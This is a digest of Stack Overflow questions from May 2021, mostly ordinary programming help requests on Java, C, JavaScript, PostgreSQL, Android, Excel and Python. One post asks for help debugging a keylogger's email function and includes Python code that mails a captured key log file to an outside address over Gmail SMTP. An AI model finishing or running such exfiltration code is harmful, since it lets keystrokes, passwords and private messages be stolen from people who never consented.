Monday, May 17, 2021

Recent Questions - Stack Overflow

How to make an input dialog with 2 fields to fill in an IntelliJ plugin

Posted: 17 May 2021 07:49 AM PDT

I use Messages.showInputDialog() to create an input dialog, but it only has one field. How can I make an input dialog with 2 input fields using Messages?

How to read strings and a float from the same line of a file in C

Posted: 17 May 2021 07:49 AM PDT

I want to read a file in C that has some data about employees from a company. I'm kind of new to C, so I have no idea how to do that. Each line of the file has some strings, and at the end of each line there's a float number. I know the size of each string. For example, the first string is a name, and the name string has a size of 70. Example: Giovani Albuquerc inoval ciano

So, in the file, I have the name of the employee, and the rest of the string is made up of spaces. I searched and saw people using fscanf, but with fscanf I can't get the whole name, because the name string can have multiple spaces between the first and second name, third name, etc.
Can someone give me some ideas, please?

Email functionality for keylogger not working

Posted: 17 May 2021 07:49 AM PDT

My code seems fine and I don't get any errors, but the email never arrives. Where did I go wrong?

The bulk of the code for the email functionality is from https://www.geeksforgeeks.org/send-mail-attachment-gmail-account-using-python/?ref=lbp. I have checked it and it all seems fine.

Here's the code:

# From keylogger code
keys_information = "key_log.txt"
file_path = "D:\\Python\\advkeylogger"
extend = "\\"

# Email functionality
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import smtplib

email_address = "#"
password = "#"
toaddr = "#"

def send_email(filename, attachment, toaddr):
    fromaddr = email_address

    msg = MIMEMultipart()  # look up function of MIMEMultipart
    msg['From'] = fromaddr
    msg['To'] = toaddr
    msg['Subject'] = "Log File"

    body = "Body_of_the_mail"  # make body of email
    msg.attach(MIMEText(body, 'plain'))  # attach body to message

    attachment = open(attachment, 'rb')  # open the attachment for binary reading

    p = MIMEBase('application', 'octet-stream')  # instance of MIMEBase named p
    p.set_payload(attachment.read())  # read the attachment into the payload
    encoders.encode_base64(p)  # encode the payload
    p.add_header('Content-Disposition', "attachment; filename= %s" % filename)  # add header
    msg.attach(p)  # attach p to msg
    s = smtplib.SMTP('smtp.gmail.com', 587)  # creates SMTP session on port 587
    s.starttls()  # start TLS for security
    s.login(fromaddr, password)  # authentication for the Gmail login
    text = msg.as_string()  # converts the multipart msg into a string
    s.sendmail(fromaddr, toaddr, text)  # sending the mail
    s.quit()  # terminating the session

send_email(keys_information, file_path + extend + keys_information, toaddr)

How can the Monaco Editor completion items provider wait for async suggestions?

Posted: 17 May 2021 07:49 AM PDT

Goal: Wait for custom suggestions from a fake server response.

Problem: I cannot understand how to tell the Monaco editor completion items provider to wait for async suggestions.

Playground example:

  1. Go to playground
  2. Paste the following code
console.log("1. Instantiate a standalone code editor");

const language = "json"
const content = `{\n\t\"dependencies\": {\n\t\t\n\t}\n}\n`
const options = {
  value: content,
  language: language,
  tabSize: 2
}
const standaloneCodeEditor = monaco.editor.create(document.getElementById("container"), options);
const sce = standaloneCodeEditor;

console.log("2. Declare function to provide a completion items")

function provideCompletionItems(model, position) {
  console.log("Invoking function 'provideCompletionItems'")

  var textUntilPosition = model.getValueInRange({ startLineNumber: 1, startColumn: 1, endLineNumber: position.lineNumber, endColumn: position.column });
  console.log("textUntilPosition:", textUntilPosition)

  var match = textUntilPosition.match(/"dependencies"\s*:\s*\{\s*("[^"]*"\s*:\s*"[^"]*"\s*,\s*)*([^"]*)?$/);
  console.log("match:", match)

  if (!match) {
    return { suggestions: [] };
  }

  var word = model.getWordUntilPosition(position);
  console.log("word:", word)

  var range = {
    startLineNumber: position.lineNumber,
    endLineNumber: position.lineNumber,
    startColumn: word.startColumn,
    endColumn: word.endColumn
  };
  console.log("range:", range)

  const mock_serverResponse = [
    {
      label: '"lodash"',
      kind: monaco.languages.CompletionItemKind.Function,
      documentation: "The Lodash library exported as Node.js modules.",
      insertText: '"lodash": "*"',
      range: range
    },
    {
      label: '"lodash111"',
      kind: monaco.languages.CompletionItemKind.Function,
      documentation: "The Lodash111 library exported as Node.js modules.",
      insertText: '"lodash111": "*"',
      range: range
    },
    {
      label: '"express"',
      kind: monaco.languages.CompletionItemKind.Function,
      documentation: "Fast, unopinionated, minimalist web framework",
      insertText: '"express": "*"',
      range: range
    },
    {
      label: '"mkdirp"',
      kind: monaco.languages.CompletionItemKind.Function,
      documentation: "Recursively mkdir, like <code>mkdir -p</code>",
      insertText: '"mkdirp": "*"',
      range: range
    },
    {
      label: '"my-third-party-library"',
      kind: monaco.languages.CompletionItemKind.Function,
      documentation: "Describe your library here",
      insertText: '"${1:my-third-party-library}": "${2:1.2.3}"',
      insertTextRules: monaco.languages.CompletionItemInsertTextRule.InsertAsSnippet,
      range: range
    }
  ]

  let myCustomSuggestions = [];
  console.log("myCustomSuggestions:", myCustomSuggestions)

  setTimeout(() => {
    const myPromise = Promise.resolve(mock_serverResponse)
    console.log("myPromise:", myPromise)

    myPromise
      .then(response => {
        console.log("response:", response)

        response.forEach(e => myCustomSuggestions.push(e))
        console.log("myCustomSuggestions:", myCustomSuggestions)

        return {
          suggestions: myCustomSuggestions
        }
      })
      .catch(err => console.error(err))
  }, 2000)
}

console.log("3. Register completion items provider")
const completionItemProvider = monaco.languages.registerCompletionItemProvider(language, {
    provideCompletionItems: () => provideCompletionItems(sce.getModel(), sce.getPosition())
});
  3. Display the web developer console (to see log messages)
  4. Run the program
  5. Type the word lodash inside the brackets
  6. Check the web developer console
  7. Notice that no suggestions are displayed

Simple Java Annotation

Posted: 17 May 2021 07:49 AM PDT

My friend and I would like to create a very simple Java annotation (for methods) which will print something simple for every method which is annotated. For example: "This method is annotated with MyCustomAnnotation" (We would then like to add a few stack-trace elements to this printout, so it needs to be flexible enough for this).

What is the simplest code to achieve this?

Our objective is as follows... invoking the following method:

@MyCustomAnnotation
public static int sayBlahAndReturnOne() {
    System.out.println("blah");
    return 1;
}

would give the following output:

"This method is annotated with MyCustomAnnotation"
"blah"

How do we achieve this? What would the @interface annotation look like?

Micronaut gRPC and Micronaut Management

Posted: 17 May 2021 07:48 AM PDT

I am currently in the process of writing a new application using Micronaut and gRPC. Deployment-wise, I am planning on having this run in a Kubernetes cluster, which in turn means that I would like to enable the management endpoints (for liveness probes and so on).

I am following the documentation here, which seems to state that simply adding the management dependency will automatically expose the various endpoints (granted, with the appropriate application.yml properties). I have done that, but I am still unable to access any kind of management endpoint.

For reference my application.yml looks like so:

---
endpoints:
  health:
    enabled: true
    sensitive: false
    details-visible: ANONYMOUS
  loggers:
    enabled: true
    write-sensitive: false
  threaddump:
    enabled: true
    sensitive: false

And my build.gradle file looks like so:

implementation("io.micronaut:micronaut-management")

What am I missing for this to work properly?

pgAdmin and terminal: FATAL: password authentication failed for user

Posted: 17 May 2021 07:48 AM PDT

Sup guys! I'm trying to create a local server in pgAdmin 4, but every time I try to create it I get this error:

Error in pgAdmin

In this case, 'veterano' is my username...

Here is what I have tried to make this work (but it doesn't):

Checking if Postgres Service is Installed correctly:

$ sudo systemctl is-active postgresql
terminal output: active

$ sudo systemctl is-enabled postgresql
terminal output: enabled

$ sudo systemctl status postgresql
terminal output: active (exited)

$ sudo pg_isready
terminal output: /var/run/postgresql:5433 - accepting connections

My pg_hba.conf configuration:

local   all             postgres                                peer
# TYPE  DATABASE        USER            ADDRESS                 METHOD
# "local" is for Unix domain socket connections only
local   all             all                                     peer
# IPv4 local connections:
host    all             all             127.0.0.1/32            md5
# IPv6 local connections:
host    all             all             ::1/128                 md5
# Allow replication connections from localhost, by a user with the
# replication privilege.
local   replication     all                                     peer
host    replication     all             127.0.0.1/32            md5
host    replication     all             ::1/128                 md5

(Every time after changing something in pg_hba.conf, I run $ sudo systemctl restart postgresql to restart the Postgres service.)

Checking psql and the new superusers: $ sudo -u postgres createuser -s $USER

terminal output: createuser: error: creation of new role failed: ERROR: role "veterano" already exists

If I try psql -U veterano I can log in... so I run \du to check the list of roles. Terminal output:

                                   List of roles
  Role name  |                         Attributes                         | Member of
-------------+------------------------------------------------------------+-----------
 postgres    | Superuser, Create role, Create DB, Replication, Bypass RLS | {}
 veterano    | Superuser, Create role, Create DB                          | {}

So I try to create a localhost server in the terminal: $ psql -h localhost -d mydatabase -U veterano -p 5432

terminal output: Password for user veterano:

(I enter the password I set with ALTER USER veterano PASSWORD 'newPassword';)

terminal output error: psql: error: FATAL: password authentication failed for user "veterano"

I really don't know what to do... I tried everything and still can't create a local server in pgAdmin 4 or directly in the terminal.

Using Ubuntu 20.04.2 LTS

(Sorry for my English)

Optimize an objective function and find out the values of the independent variables in Python

Posted: 17 May 2021 07:48 AM PDT

I have a profit function, which is my objective function, profit. Profit is a function of six independent variables: profit = f(x1,x2,x3,x4,x5,x6). It is subject to a capital constraint: the function is iterated as long as the capital stays between two values.

My aim is to find the values of the independent variables (which are real numbers) for which the profit is maximized. Currently, I am manually changing the values of these variables in the code, which uses a dataframe as input, but this method is not efficient and would not yield the optimal result. I thought of using a for loop to iterate over different combinations of values for the six variables, but this process would be highly time-consuming. Therefore, I wanted to know if there are any libraries in Python that can help with this optimization problem. I would also appreciate any suggestions on how to approach it.
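For what it's worth, scipy's optimizers can search all six variables at once. The sketch below is only an illustration under stated assumptions: the profit function, the bounds, and the capital limits are made-up placeholders to be replaced with the real f(x1..x6) and the real constraint values.

```python
import numpy as np
from scipy.optimize import minimize

# Hypothetical stand-in for the real profit function f(x1..x6).
def profit(x):
    weights = np.array([1.0, 2.0, 0.5, 1.5, 0.8, 1.2])
    return float(weights @ x - 0.01 * x @ x)

# Capital constraint (illustrative numbers): total capital must stay between 50 and 100.
constraints = [
    {"type": "ineq", "fun": lambda x: np.sum(x) - 50.0},   # capital >= 50
    {"type": "ineq", "fun": lambda x: 100.0 - np.sum(x)},  # capital <= 100
]
bounds = [(0.0, 50.0)] * 6      # each variable is a bounded real number
x0 = np.full(6, 10.0)           # starting guess

# SLSQP supports bounds plus inequality constraints; maximize by minimizing -profit.
result = minimize(lambda x: -profit(x), x0, method="SLSQP",
                  bounds=bounds, constraints=constraints)
print(result.x)       # candidate optimal values of the six variables
print(-result.fun)    # profit at that point
```

Note that scipy.optimize.minimize finds local optima; for a rough global search over the same bounds, scipy.optimize.differential_evolution is another option.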

Python: xml.etree ET.findtext chops the first letter of the text

Posted: 17 May 2021 07:49 AM PDT

I am trying to parse an XML file (PASCAL VOC dataset format) and save the necessary information. I am trying to extract information from the "object" element. In order to extract the name subelement's text I use obj.findtext('name'). obj is passed as an argument and is the first match from for obj in annotation_root.findall('object'):, where annotation_root is the parsed XML file.

This is expected to return 'broccoli'. However, it returns 'roccoli'. I tried the findtext method with other subelements of the "object" element and it always chops the first letter, e.g. 'Unspecified' becomes 'nspecified', and '0' returns an empty string.

I haven't found anything online regarding this issue, it seems like a bug. Any help is appreciated, thanks!
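For reference, findtext itself returns the element's full text. A minimal sketch (the inline XML below is an assumed stand-in for a PASCAL VOC file) prints the complete strings, which suggests the first character is being dropped somewhere after the parse, e.g. by a stray [1:] slice:

```python
import xml.etree.ElementTree as ET

# Assumed minimal PASCAL VOC-style snippet, inlined for illustration.
xml_data = """
<annotation>
  <object>
    <name>broccoli</name>
    <pose>Unspecified</pose>
    <truncated>0</truncated>
  </object>
</annotation>
"""

annotation_root = ET.fromstring(xml_data)
for obj in annotation_root.findall('object'):
    print(obj.findtext('name'))       # broccoli
    print(obj.findtext('pose'))       # Unspecified
    print(obj.findtext('truncated'))  # 0
```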

How do I connect 2 input boxes to a single function in React

Posted: 17 May 2021 07:49 AM PDT

weightCalc(event) {
  console.log(event)
}

render() {
  return (
    <div>
      <label>
        Stones
        <input type="textbox" name="test" onChange={this.weightCalc}/>
      </label>

      <label>
        Pounds <input type="textbox" name="test2" onChange={this.weightCalc} />
      </label>

I want to be able to use one function with the values from the 2 inputs and then update the state, please.

android studio capture image faster

Posted: 17 May 2021 07:48 AM PDT

I have a camera application project and I want to take two photos at a 200 ms interval, but it usually takes the pictures 450-550 ms apart. How can I take photos faster? I open the camera surface view, and when I push the button a handler starts the timer; when the time reaches the 60000-millisecond mark the camera captures the first image and, 200 ms later, the second image.


public class camerax_timer extends AppCompatActivity {

    private TextureView textureView;
    TextView editColor;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_camerax_timer);
        editColor = findViewById(R.id.textcolor);
        textureView = findViewById(R.id.view_finder);

        textureView.post((Runnable) (new Runnable() {
            public final void run() {
                startCamera();
            }
        }));

        textureView.addOnLayoutChangeListener(new View.OnLayoutChangeListener() {
            @Override
            public void onLayoutChange(View view, int left, int top, int right, int bottom,
                                       int oldLeft, int oldTop, int oldRight, int oldBottom) {
                updateTransform();
            }
        });

        Button button_ileri = findViewById(R.id.ileri_image);
        button_ileri.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                Intent intent = new Intent(camerax_timer.this, veri_hesaplama.class);
                startActivity(intent);
            }
        });
    }

    private void startCamera() {
        PreviewConfig.Builder previewConfig = new PreviewConfig.Builder();

        Preview preview = new Preview(previewConfig.build());

        preview.setOnPreviewOutputUpdateListener(new Preview.OnPreviewOutputUpdateListener() {
            @Override
            public void onUpdated(Preview.PreviewOutput output) {
                ViewGroup parent = (ViewGroup) textureView.getParent();
                parent.removeView(textureView);
                parent.addView(textureView, 0);

                textureView.setSurfaceTexture(output.getSurfaceTexture());
                updateTransform();
            }
        });

        ImageCaptureConfig.Builder imageCaptureConfig = new ImageCaptureConfig.Builder();

        final ImageCapture imageCapture = new ImageCapture(imageCaptureConfig.build());

        final Button button = findViewById(R.id.button);
        button.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View view) {

                new Handler().postDelayed(new Runnable() {
                    @Override
                    public void run() {
                        imageCapture.takePicture(new ImageCapture.OnImageCapturedListener() {
                            @Override
                            public void onCaptureSuccess(ImageProxy image, int rotationDegrees) {
                                ImageView imageView = findViewById(R.id.img1);
                                imageView.setImageBitmap(imageProxyToBitmap(image));
                                imageView.setRotation(rotationDegrees);
                                image.close();
                            }
                        });
                    }
                }, 60000);

                new Handler().postDelayed(new Runnable() {
                    @Override
                    public void run() {
                        imageCapture.takePicture(new ImageCapture.OnImageCapturedListener() {
                            @Override
                            public void onCaptureSuccess(ImageProxy image, int rotationDegrees) {
                                ImageView imageView = findViewById(R.id.img2);
                                imageView.setImageBitmap(imageProxyToBitmap(image));
                                imageView.setRotation(rotationDegrees);
                                image.close();
                            }
                        });
                    }
                }, 60200);
            }
        });

        CameraX.bindToLifecycle(this, preview, imageCapture);
    }

    private void updateTransform() {
        Matrix matrix = new Matrix();

        float centerX = textureView.getWidth() / 2f;
        float centerY = textureView.getHeight() / 2f;
        float rotationDegrees = 0;
        matrix.postRotate(-rotationDegrees, centerX, centerY);
        textureView.setTransform(matrix);
    }

    private Bitmap imageProxyToBitmap(ImageProxy image) {
        ImageProxy.PlaneProxy planeProxy = image.getPlanes()[0];
        ByteBuffer buffer = planeProxy.getBuffer();
        byte[] bytes = new byte[buffer.remaining()];
        buffer.get(bytes);
        return BitmapFactory.decodeByteArray(bytes, 0, bytes.length);
    }
}

Delete lines from a string that appears in other string

Posted: 17 May 2021 07:49 AM PDT

I have two strings, here an example:

String1:

example1
example2
example3
example4

and the second string:

example5
example1
example25

The idea is to delete, from the first string, all the lines that appear in both strings; the result should be something like this:

String1:

example2
example3
example4

The result must be a string too.
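Assuming Python (the question doesn't name a language), one way to sketch this: split both strings into lines, keep only the lines of the first that don't occur in the second, and join the survivors back into a string:

```python
string1 = "example1\nexample2\nexample3\nexample4"
string2 = "example5\nexample1\nexample25"

# Lines of the second string, as a set for fast membership tests
to_remove = set(string2.splitlines())

# Rebuild the first string without the shared lines
result = "\n".join(line for line in string1.splitlines()
                   if line not in to_remove)
print(result)
```

This removes exact line matches only; 'example25' does not match 'example2'.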

How to show/hide button in its click event before and after a synchronous ajax call?

Posted: 17 May 2021 07:49 AM PDT

I need to hide the "Pdf export" button and show a loading icon when the button click event starts, then wait for my ajax request to finish and reverse the button state.

But as the ajax call is synchronous, the hide/show before it is never painted by the browser, because it is reversed again at the end.

$("#ActualButton").hide();
$("#loadingSpinner").show();

$.ajax({
    url: "/Controller/Action",
    type: 'POST',
    async: false,
    success: function (data)
    {
    }
});

$("#ActualButton").show();
$("#loadingSpinner").hide();

Q1: How can I make the button change visible in the browser?

Q2: Also, is there any way to detect completion of the ajax call other than making it synchronous?

Interrelating two arrays

Posted: 17 May 2021 07:49 AM PDT

I want to pick a random verb from one array and display its adverb by selecting from another array using a button.

I want to solve the following two issues:

Issue 1:

How do I make the button clickable only 5 times, and then display the message "Come tomorrow!"?

Issue 2:

How do I make the button clickable an infinite number of times, so it keeps showing the random words?

Here is my code:

const EL_verb = document.querySelector("#verb");
const EL_adverb = document.querySelector("#adverb");
const EL_btn = document.querySelector("#btn");
const verbs = ["Slow", "Quick"];
const adverbs = ["Slowly", "Quickly"];

var i;
for (i = 0; i < verbs.length; i++) {
  var randomVerb = verbs[Math.floor(Math.random() * verbs.length)]; // index for a random verb
}

const displayWords = () => {
  EL_verb.innerHTML = randomVerb;
};

EL_btn.addEventListener("click", displayWords);
.wrapper {
  border: 1px solid #333;
  padding: 4px 16px 16px;
  border-radius: 3px;
}

#msg {
  display: none;
}
<div class="wrapper">
  <h2><u>Random Verb and Adverb:</u></h2>
  <h3 id="msg">Come tomorrow!</h3>

  <p><b>Verb: </b><span id="verb"></span></p>
  <p><b>Adverb:</b><span id="adverb"></span></p>

  <button id="btn" type="button">RANDOM</button>
</div>

Use range in column values to create new rows in R

Posted: 17 May 2021 07:48 AM PDT

I have a data set that looks like this

id<-c(333,333,333,342,342,342,342)
status<-c('relationship','relationship','married','single','single','married')
start<-c(17,19,25,22,36,40)
end<-c(18,23,29,29,39,44)

dat<-data.frame(id,status,start,end)

   id       status start end
1 333 relationship    17  18
2 333 relationship    19  23
3 333      married    25  29
4 342       single    32  35
5 342       single    36  39
6 342       single    42  44
7 342      married    45  50

My goal is to make a row for each year/age of the person under observation. For example, person 333 is observed from age 17 to 29 (from 17 to 18, this person was in a relationship, 19 to 23 in a relationship), with some gap years (which should be coded unknown). For those whose next episode start year is missing, the end status can be seen as that age's status. But if there is an overlap then the start age status prevails (e.g. if someone is in a relationship 17 to 19, then married 19 to 22, then age 19 should take married as its status). So the end result should look like this:

   id start       status
1  333    17 relationship
2  333    18 relationship
3  333    19 relationship
4  333    20 relationship
5  333    21 relationship
6  333    22 relationship
7  333    23 relationship
8  333    24      unknown
9  333    25      married
10 333    26      married
11 333    27      married
12 333    28      married
13 333    29      married
14 342    22       single
15 342    23       single
16 342    24       single
17 342    25       single
18 342    26       single
19 342    27       single
20 342    28       single
21 342    29       single
22 342    30      unknown
23 342    31      unknown
24 342    32      unknown
25 342    33      unknown
26 342    34      unknown
27 342    35      unknown
28 342    36       single
29 342    37       single
30 342    38       single
31 342    39       single
32 342    40      married
33 342    41      married
34 342    42      married
35 342    43      married
36 342    44      married

Is there a way of doing this without writing a for loop?

Needed permission to access /dev/diag

Posted: 17 May 2021 07:48 AM PDT

I am trying to open /dev/diag using JNI with open("/dev/diag", O_RDWR | O_LARGEFILE | O_NONBLOCK);, but it returns errno 13: Permission denied.

What should be done to make this work?

When checking the ownership of /dev/diag with the command ls -l /dev/diag, it returns crw-rw-rw- system qcom_diag 244, 0 2015-01-14 01:47 diag, and when I run the command id I get uid=0(root) gid=0(root) groups=0(root) context=u:r:init:s0

So I thought the problem is related to ownership?

Even tried to add these to my manifest with no luck:

<application
    android:sharedUserId="android.uid.system"
    android:process="system" .../>

and to add the permissions referring to https://android.googlesource.com/platform/frameworks/base/+/cd92588/data/etc/platform.xml as:

<permission android:name="android.permission.DIAGNOSTIC" />
<permission android:name="android.permission.READ_NETWORK_USAGE_HISTORY"/>
<permission android:name="android.permission.MODIFY_NETWORK_ACCOUNTING"/>
<permission android:name="android.permission.LOOP_RADIO" />

Google Sheets ArrayFormula with Multiple IF / AND / OR Conditions to Return 1 or 0

Posted: 17 May 2021 07:48 AM PDT

I have to determine whether the total driving time per day, for each driver, exceeds 6 hours or not.

There are two columns with start/finish dates and times, but sometimes there are multiple start/finish times for the same day. In this case, the formula should only evaluate to 1 for the first instance of that date. If the dates are different, then it needs to evaluate to 1 if the total driving time for that day is more than 6 hours. I imagine that a piece of code in Google Apps Script could potentially resolve this issue, but I have not managed to get anywhere with that.

I have managed to go as far as having the formula evaluate to 1 or 0 if neither the DRIVERS nor the START columns are blank, and the difference between START and FINISH is more than 6 hours, and either the previous or the following START date is the same as the one that is currently being evaluated in the array.

This is the formula that is able to do what I have just explained:

=ARRAYFORMULA(IFERROR(
  IF(ISBLANK(A2:A),,
  IF(
  (B2:B<>"")
  *
  ((C2:C-B2:B)*24>=6)
  *
  ((DATEVALUE(TO_DATE(INDEX(SPLIT(B2:B," ",1,1),,1)))=DATEVALUE(TO_DATE(INDEX(SPLIT(OFFSET(B2:B,1,0)," ",1,1),,1)))))
  +
  ((DATEVALUE(TO_DATE(INDEX(SPLIT(B2:B," ",1,1),,1)))=DATEVALUE(TO_DATE(INDEX(SPLIT(OFFSET(B2:B,-1,0)," ",1,1),,1)))))=1,1,0))))

The issues that I could not resolve are:

  1. My formula will evaluate to 1 for all instances of the date that is the same as the previous or the next.

  2. The formula does not evaluate to 1 if the date is unique but the driving time is more than 6 hours.

For more information, I have attached a version of the sheet that is focused entirely on this issue here.


I would highly appreciate it if anyone would be kind enough to help me resolve this issue. Also, if my description was not clear enough, please do not hesitate to contact me.

Search data in variable table Excel

Posted: 17 May 2021 07:49 AM PDT

In my Excel file, I have data split up over different tables for different values of parameter X.

I have tables for parameter X for the values 0.1, 0.5, 1, 5 and 10. Each table has a parameter Y at the far left that I want to be able to search for, with a few data cells to the right of it. Like so:

X = 0.1

Y Data_0 Data_1 Data_2
1 0.071251 0.681281 0.238509
2 0.283393 0.509497 0.397196
3 0.678296 0.789879 0.439004
4 0.788525 0.363215 0.248953

etc.

Now I want to find Data_0, Data_1 and Data_2 for a given X and Y value (in two separate cells).

My thought was naming the tables X0.1 X0.5 etc. and when defining the matrix for the lookup function use some syntax that would change the table it searches in. With three of these functions in adjacent cells, I would obtain the three values desired. Is that possible, or is there some other method that would give me the result I want?

Thanks in advance

On the question of what my desired result from this data would be: I would like A1 to hold the X value I'm searching for (0.1 in this case) and A2 the Y value (let's pick 3);

then I want C1:E1 to give the values 0.678... 0.789... 0.439...

Following usmanhaq's suggestion, I think it should be something like:

=vlookup(A2,concatenate("X",A1),2)
=vlookup(A2,concatenate("X",A1),3)
=vlookup(A2,concatenate("X",A1),4)

for the three cells. This exact formulation doesn't work, and I can't find the formulation that does.

Is there any reason to continue reading an InputStream if the number of bytes read is 0?

Posted: 17 May 2021 07:48 AM PDT

Usually, when I deal with an InputStream, the condition to stop reading is when the number of bytes read is less than or equal to 0.

For instance,

InputStream in = new FileInputStream(src);
OutputStream out = new FileOutputStream(dst);

// Transfer bytes from in to out
byte[] buf = new byte[1024];
int len;
while ((len = in.read(buf)) > 0) {
    out.write(buf, 0, len);
}

However, when I look at the documentation of InputStream

https://docs.oracle.com/javase/7/docs/api/java/io/InputStream.html#read(byte[])

I only notice that:

-1 if there is no more data because the end of the stream has been reached.

I was wondering, should I refactor my code to

InputStream in = new FileInputStream(src);
OutputStream out = new FileOutputStream(dst);

// Transfer bytes from in to out
byte[] buf = new byte[1024];
int len;
while ((len = in.read(buf)) != -1) {
    if (len > 0) {
        out.write(buf, 0, len);
    }
}

Will there be any edge case where checking while ((len = in.read(buf)) > 0) causes an unwanted bug?

How to connect to JBoss EAP 7.3 using VisualVM in OpenShift

Posted: 17 May 2021 07:49 AM PDT

I am trying to connect an application with VisualVM, but VisualVM is unable to connect to the application. Below is the env:

  • JBoss EAP 7.3
  • Java 11
  • OpenShift

I have tried to configure it in different ways, but all failed:

Config try 1: Use a few env variables in a script file, so that it executes first (file contents are mentioned below): echo *** Adding system property for VisualVM ***

batch
/system-property=jboss.modules.system.pkgs:add(value="org.jboss.byteman,com.manageengine,org.jboss.logmanager")
/system-property=java.util.logging.manager:add(value="org.jboss.logmanager.LogManager")
run-batch

I can see that the above commands executed successfully and the above properties are available in the JBoss config (I verified this using a JBoss CLI command).

JAVA_TOOLS_OPTIONS: -agentlib:jdwp=transport=dt_socket,server=y,address=8000,suspend=n -Dcom.sun.management.jmxremote=true -Dcom.sun.management.jmxremote.port=3000 -Dcom.sun.management.jmxremote.rmi.port=3001 -Djava.rmi.server.hostname=127.0.0.1 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Xbootclasspath/a:/opt/eap/modules/system/layers/base/org/jboss/log4j/logmanager/main/log4j-jboss-logmanager-1.2.0.Final-redhat-00001.jar -Xbootclasspath/a:/opt/eap/modules/system/layers/base/org/jboss/logmanager/main/jboss-logmanager-2.1.14.Final-redhat-00001.jar  

Result:

- java.lang.RuntimeException: WFLYCTL0079: Failed initializing module org.jboss.as.logging
- Caused by: java.util.concurrent.ExecutionException: java.lang.IllegalStateException: WFLYLOG0078: The logging subsystem requires the log manager to be org.jboss.logmanager.LogManager. The subsystem has not be initialized and cannot be used. To use JBoss Log Manager you must add the system property "java.util.logging.manager" and set it to "org.jboss.logmanager.LogManager"

Config 2:

JAVA_TOOL_OPTIONS= -agentlib:jdwp=transport=dt_socket,server=y,address=8000,suspend=n -Dcom.sun.management.jmxremote=true -Dcom.sun.management.jmxremote.port=3000 -Dcom.sun.management.jmxremote.rmi.port=3001 -Djava.rmi.server.hostname=127.0.0.1 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Djava.util.logging.manager=org.jboss.logmanager.LogManager -Djboss.modules.system.pkgs=org.jboss.byteman,org.jboss.logmanager -Xbootclasspath/a:/opt/eap/modules/system/layers/base/org/jboss/log4j/logmanager/main/log4j-jboss-logmanager-1.2.0.Final-redhat-00001.jar -Xbootclasspath/a:/opt/eap/modules/system/layers/base/org/jboss/logmanager/main/jboss-logmanager-2.1.14.Final-redhat-00001.jar  

Result:

WARNING: Failed to instantiate LoggerFinder provider; Using default.
java.lang.IllegalStateException: The LogManager was not properly installed (you must set the "java.util.logging.manager" system property to "org.jboss.logmanager.LogManager")

Config 3:

• Modified standalone.conf, putting all the required configuration in that file.

Result:

WARNING: Failed to instantiate LoggerFinder provider; Using default.
java.lang.IllegalStateException: The LogManager was not properly installed (you must set the "java.util.logging.manager" system property to "org.jboss.logmanager.LogManager")

Could you please suggest the correct configuration?

python equation calculation with exp() function

Posted: 17 May 2021 07:48 AM PDT

Here is the equation I'm trying to solve:

original

The correct answer must be 0.347, and this is what I got:

from math import *

exp(((-4.4 + 0.6*(0.6/1.2))*tan(25)) + ((3.07*sin(25))*(log(2*4.29))/(1+sin(25))))

output:

0.6318  

I tried to use radians, tan(radians(25)), but I keep getting wrong results.
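For what it's worth, here is a sketch that reproduces the expected value, under two assumptions: the 25 in the formula is in degrees, and "log" in the original equation means the base-10 logarithm (Python's math.log is the natural log):

```python
from math import exp, tan, sin, log10, radians

# Assumption: angle is 25 degrees, and "log" in the formula is base-10.
angle = radians(25)
result = exp((-4.4 + 0.6 * (0.6 / 1.2)) * tan(angle)
             + (3.07 * sin(angle)) * log10(2 * 4.29) / (1 + sin(angle)))
print(round(result, 3))  # → 0.346, matching 0.347 up to rounding of the inputs
```

Using radians alone is not enough here; with the natural log the result comes out near 1.05, which is why switching log to log10 is the other half of the hypothesis.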

python need to convert a "linspace" into something more "logarithmic"

Posted: 17 May 2021 07:49 AM PDT

Forgive me, I've always been very bad at math; now I'm trying to learn some Python (and some math as well) by coding.

I have this:

import numpy as np
import matplotlib.pyplot as plt

whole = 1    # percentage: 1 = 100%, 0.1 = 10% etc.
nparts = 10  # how many "steps" we want to use
origin = 100 # starting value

ranged = origin * whole # defining the percentage of our starting value

values = np.linspace(origin - ranged/2, origin + ranged/2, nparts * 2)

r = []
g = []
for v in values:
    if v > origin:
        r.append(v)
        #reds = f"{v} is {100*(v - origin)/origin}% of {origin}"
        #print(reds)
    else:
        g.append(v)
        #greens = f"{v} is {100*(v - origin)/origin}% of {origin}"
        #print(greens)

print("reds")
print(r)
print("greens")
print(g)

These last print(g) and print(r) output the numerical results.

If I plot this, you can clearly see what this does.

axes = plt.gca()

#origin BLUE
plt.axhline(y=origin, color='b', linestyle='-')

#reds
for i in r:
    plt.axhline(y=i, color='r', linestyle='-')
#greens
for i in g:
    plt.axhline(y=i, color='g', linestyle='-')

plot

So as you can see, given an origin (blue line) and a +/- percentage whole, it creates the lines (nparts on each side): red if they are > origin and green if < origin, spreading them linearly with values = np.linspace(origin - ranged/2, origin + ranged/2, nparts * 2) over the whole percentage range around the origin value.

Now my question is: how can I spread those lines in a logarithmic way? (Don't get me wrong, I'm so bad at math I don't even know if what I'm looking for is logarithmic-related.) I would like to achieve something like this (I did photoshop the plotted image). I would really love to keep that whole, and maybe be able to add a new variable to "control" this logarithmic spreading.

Basically I need another function to replace values = np.linspace(origin - ranged/2, origin + ranged/2, nparts * 2) to achieve the desired result attached below. I tried both np.geomspace and np.logspace without any success; maybe I'm just bad, or maybe I need another way to do this.
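One possible direction (a sketch, not a definitive fix): np.geomspace keeps the *ratio* between consecutive values constant rather than the difference, so the lines bunch up near the lower endpoint and spread out toward the upper one. It only works while both endpoints stay positive, i.e. while whole < 2 with these variables:

```python
import numpy as np

whole = 1
nparts = 10
origin = 100
ranged = origin * whole

# geomspace: constant ratio between neighbours instead of constant difference
values = np.geomspace(origin - ranged/2, origin + ranged/2, nparts * 2)

# The gaps between consecutive lines grow as the values grow,
# unlike linspace's equal gaps.
print(np.round(np.diff(values), 2))
```

To "control" the amount of spreading, one hypothetical knob is to raise a linear 0..1 ramp to a power k and interpolate between the endpoints with it: k = 1 reproduces linspace, larger k pushes the lines toward one end.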

Desired result: desired result

